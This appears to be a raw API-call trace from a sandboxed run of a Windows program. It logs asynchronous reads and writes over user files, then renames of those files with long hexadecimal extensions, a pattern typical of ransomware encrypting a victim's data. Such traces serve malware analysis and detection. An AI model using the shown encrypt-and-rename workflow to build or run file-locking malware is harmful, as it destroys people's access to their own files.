GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.764] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x73e00f8, ReturnLength=0x714f8ac) returned 0x0 [0163.766] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg", lpString2=".15AA29BFABBDFD0CD4B5B1A5BBEB13E197FCAC43FE939A2B847D4CD896ADC50B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.15AA29BFABBDFD0CD4B5B1A5BBEB13E197FCAC43FE939A2B847D4CD896ADC50B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.15AA29BFABBDFD0CD4B5B1A5BBEB13E197FCAC43FE939A2B847D4CD896ADC50B" [0163.766] GetProcessHeap () returned 0x270000 [0163.766] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x158) returned 0x35b308 [0163.766] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x714f89c, FileInformation=0x35b308, Length=0x158, FileInformationClass=0xa) returned 0x0 [0163.772] CloseHandle (hObject=0x5b8) returned 1 [0163.861] GetProcessHeap () returned 0x270000 [0163.863] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0163.863] RtlInterlockedCompareExchange64 () returned 0x1 [0163.863] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.863] ReadFile (in: hFile=0x5bc, lpBuffer=0x75ca808, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa6d0 | out: lpBuffer=0x75ca808*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa6d0) returned 1 [0163.863] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.863] ReadFile (in: hFile=0x5c0, lpBuffer=0x7620190, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7600058 | out: lpBuffer=0x7620190*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7600058) returned 1 [0163.863] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.876] WriteFile (in: hFile=0x594, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0163.877] RtlInterlockedCompareExchange64 () returned 0x4 [0163.877] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.877] NtQueryObject (in: Handle=0x5a8, ObjectInformationClass=0x1, ObjectInformation=0x7582628, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x7582628, ReturnLength=0x714f8ac) returned 0x0 [0163.878] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg", lpString2=".B16834F526A94EC78CFF41D68EE5F6683FE1987F040002C9992EA340C23BE829" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.B16834F526A94EC78CFF41D68EE5F6683FE1987F040002C9992EA340C23BE829") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.B16834F526A94EC78CFF41D68EE5F6683FE1987F040002C9992EA340C23BE829" [0163.878] GetProcessHeap () returned 0x270000 [0163.878] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x166) returned 0x7420f30 [0163.878] NtSetInformationFile (FileHandle=0x5a8, IoStatusBlock=0x714f89c, FileInformation=0x7420f30, Length=0x166, FileInformationClass=0xa) returned 0x0 [0163.881] CloseHandle (hObject=0x5a8) returned 1 [0163.883] GetProcessHeap () returned 0x270000 [0163.884] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7582578 | out: hHeap=0x270000) returned 1 [0163.884] RtlInterlockedCompareExchange64 () returned 0x5 [0163.885] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.885] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x744a270, ReturnLength=0x714f8ac) returned 0x0 [0163.886] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg", lpString2=".C3CC1893BB110443A077BFF823728301428F287800A849EF3863B0D654F68D78" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.C3CC1893BB110443A077BFF823728301428F287800A849EF3863B0D654F68D78") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.C3CC1893BB110443A077BFF823728301428F287800A849EF3863B0D654F68D78" [0163.886] GetProcessHeap () returned 0x270000 [0163.886] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x166) returned 0x74210a8 [0163.886] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x714f89c, FileInformation=0x74210a8, Length=0x166, FileInformationClass=0xa) returned 0x0 [0163.887] CloseHandle (hObject=0x594) returned 1 [0163.890] GetProcessHeap () returned 0x270000 [0163.891] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0163.899] RtlInterlockedCompareExchange64 () returned 0x4 [0163.900] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.331] ReadFile (in: hFile=0x5b4, lpBuffer=0x757a558, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a420 | out: lpBuffer=0x757a558*, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a420) returned 1 [0164.331] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.331] ReadFile (in: hFile=0x5bc, lpBuffer=0x75a26b0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7582578 | out: lpBuffer=0x75a26b0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7582578) returned 1 [0164.332] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.332] ReadFile (in: hFile=0x5c0, lpBuffer=0x75ca808, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa6d0 | out: lpBuffer=0x75ca808*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa6d0) returned 1 [0164.332] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.333] ReadFile (in: hFile=0x594, lpBuffer=0x76382e0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76181a8 | out: lpBuffer=0x76382e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76181a8) returned 1 [0164.333] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.333] ReadFile (in: hFile=0x5a8, lpBuffer=0x7660438, nNumberOfBytesToRead=0x7000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7640300 | out: lpBuffer=0x7660438*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7640300) returned 1 [0164.333] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.334] ReadFile (in: hFile=0x5c4, lpBuffer=0x7688590, nNumberOfBytesToRead=0x2a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7668458 | out: lpBuffer=0x7688590*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7668458) returned 1 [0164.334] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.334] ReadFile (in: hFile=0x5c8, lpBuffer=0x76b06e8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76905b0 | out: lpBuffer=0x76b06e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76905b0) returned 1 [0164.335] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.335] ReadFile (in: hFile=0x5cc, lpBuffer=0x76d8840, nNumberOfBytesToRead=0x7000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76b8708 | out: lpBuffer=0x76d8840*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76b8708) returned 1 [0164.336] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.336] ReadFile (in: hFile=0x5d0, lpBuffer=0x7700998, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76e0860 | out: lpBuffer=0x7700998*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76e0860) returned 1 [0164.336] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.336] ReadFile (in: hFile=0x5d4, lpBuffer=0x7728af0, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x0, lpOverlapped=0x77089b8 | out: lpBuffer=0x7728af0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x77089b8) returned 1 [0164.337] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.337] ReadFile (in: hFile=0x5d8, lpBuffer=0x7750c48, nNumberOfBytesToRead=0x7c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7730b10 | out: lpBuffer=0x7750c48*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7730b10) returned 1 [0164.338] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.338] ReadFile (in: hFile=0x5dc, lpBuffer=0x7778da0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7758c68 | out: lpBuffer=0x7778da0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7758c68) returned 1 [0164.338] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.338] ReadFile (in: hFile=0x5e0, lpBuffer=0x77a0ef8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7780dc0 | out: lpBuffer=0x77a0ef8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7780dc0) returned 1 [0164.339] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.339] WriteFile (in: hFile=0x5b4, lpBuffer=0x757a558*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a420 | out: lpBuffer=0x757a558*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a420) returned 1 [0164.341] RtlInterlockedCompareExchange64 () returned 0x1 [0164.341] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.341] WriteFile (in: hFile=0x5bc, lpBuffer=0x75a26b0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7582578 | out: lpBuffer=0x75a26b0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7582578) returned 1 [0164.343] RtlInterlockedCompareExchange64 () returned 0x2 [0164.343] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.343] WriteFile (in: hFile=0x5c0, lpBuffer=0x75ca808*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa6d0 | out: lpBuffer=0x75ca808*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa6d0) returned 1 [0164.344] RtlInterlockedCompareExchange64 () returned 0x3 [0164.344] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.344] WriteFile (in: hFile=0x594, lpBuffer=0x76382e0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76181a8 | out: lpBuffer=0x76382e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76181a8) returned 1 [0164.346] RtlInterlockedCompareExchange64 () returned 0x4 [0164.346] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.346] WriteFile (in: hFile=0x5a8, lpBuffer=0x7660438*, nNumberOfBytesToWrite=0x7000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7640300 | out: lpBuffer=0x7660438*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7640300) returned 1 [0164.347] RtlInterlockedCompareExchange64 () returned 0x5 [0164.347] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.347] WriteFile (in: hFile=0x5c4, lpBuffer=0x7688590*, nNumberOfBytesToWrite=0x2a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7668458 | out: lpBuffer=0x7688590*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7668458) returned 1 [0164.348] RtlInterlockedCompareExchange64 () returned 0x6 [0164.348] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.349] WriteFile (in: hFile=0x5c8, lpBuffer=0x76b06e8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76905b0 | out: lpBuffer=0x76b06e8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76905b0) returned 1 [0164.350] RtlInterlockedCompareExchange64 () returned 0x7 [0164.350] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.351] WriteFile (in: hFile=0x5cc, lpBuffer=0x76d8840*, nNumberOfBytesToWrite=0x7000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76b8708 | out: lpBuffer=0x76d8840*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76b8708) returned 1 [0164.352] RtlInterlockedCompareExchange64 () returned 0x8 [0164.352] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.352] WriteFile (in: hFile=0x5d0, lpBuffer=0x7700998*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76e0860 | out: lpBuffer=0x7700998*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76e0860) returned 1 [0164.353] RtlInterlockedCompareExchange64 () returned 0x9 [0164.353] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.353] WriteFile (in: hFile=0x5d4, lpBuffer=0x7728af0*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77089b8 | out: lpBuffer=0x7728af0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77089b8) returned 1 [0164.354] RtlInterlockedCompareExchange64 () returned 0xa [0164.354] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.355] WriteFile (in: hFile=0x5d8, lpBuffer=0x7750c48*, nNumberOfBytesToWrite=0x7c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7730b10 | out: lpBuffer=0x7750c48*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7730b10) returned 1 [0164.356] RtlInterlockedCompareExchange64 () returned 0xb [0164.356] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.356] WriteFile (in: hFile=0x5dc, lpBuffer=0x7778da0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7758c68 | out: lpBuffer=0x7778da0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7758c68) returned 1 [0164.357] RtlInterlockedCompareExchange64 () returned 0xc [0164.357] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.358] WriteFile (in: hFile=0x5e0, lpBuffer=0x77a0ef8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7780dc0 | out: lpBuffer=0x77a0ef8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7780dc0) returned 1 [0164.359] RtlInterlockedCompareExchange64 () returned 0xd [0164.359] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.359] NtQueryObject (in: Handle=0x5b4, ObjectInformationClass=0x1, ObjectInformation=0x755a4d0, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x755a4d0, ReturnLength=0x714f8ac) returned 0x0 [0164.360] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\P0ZYRY4.mp4", lpString2=".0511E6348750B24F7AD4C9FABAC4FB75D5F2145EDB84CB4D8A30AAE6D5CE0B6B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\P0ZYRY4.mp4.0511E6348750B24F7AD4C9FABAC4FB75D5F2145EDB84CB4D8A30AAE6D5CE0B6B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\P0ZYRY4.mp4.0511E6348750B24F7AD4C9FABAC4FB75D5F2145EDB84CB4D8A30AAE6D5CE0B6B" [0164.360] GetProcessHeap () returned 0x270000 [0164.360] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x425cdf0 [0164.361] NtSetInformationFile (FileHandle=0x5b4, IoStatusBlock=0x714f89c, FileInformation=0x425cdf0, Length=0x122, FileInformationClass=0xa) returned 0x0 [0164.363] CloseHandle (hObject=0x5b4) returned 1 [0164.366] GetProcessHeap () returned 0x270000 [0164.368] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x755a420 | out: hHeap=0x270000) returned 1 [0164.671] RtlInterlockedCompareExchange64 () returned 0x8 [0164.671] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0165.988] WriteFile (in: hFile=0x5b0, lpBuffer=0x7610188*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75f0050 | out: lpBuffer=0x7610188*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75f0050) returned 1 [0165.990] RtlInterlockedCompareExchange64 () returned 0x2 [0165.990] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0167.858] ReadFile (in: hFile=0x58c, lpBuffer=0x76282d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76081a0 | out: lpBuffer=0x76282d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76081a0) returned 1 [0167.862] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0167.863] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x7608250, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x7608250, ReturnLength=0x714f8ac) returned 0x0 [0167.864] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HgGnGttNLJOcZZ62.m4a", lpString2=".EA93EA9A2392EF1418FC72346CE11DDC28CAFD46F08BF8D10F6ADBB2D37AE26D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HgGnGttNLJOcZZ62.m4a.EA93EA9A2392EF1418FC72346CE11DDC28CAFD46F08BF8D10F6ADBB2D37AE26D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HgGnGttNLJOcZZ62.m4a.EA93EA9A2392EF1418FC72346CE11DDC28CAFD46F08BF8D10F6ADBB2D37AE26D" [0167.865] GetProcessHeap () returned 0x270000 [0167.865] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x132) returned 0x42636d8 [0167.865] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x714f89c, FileInformation=0x42636d8, Length=0x132, FileInformationClass=0xa) returned 0x0 [0167.866] CloseHandle (hObject=0x58c) returned 1 [0167.867] GetProcessHeap () 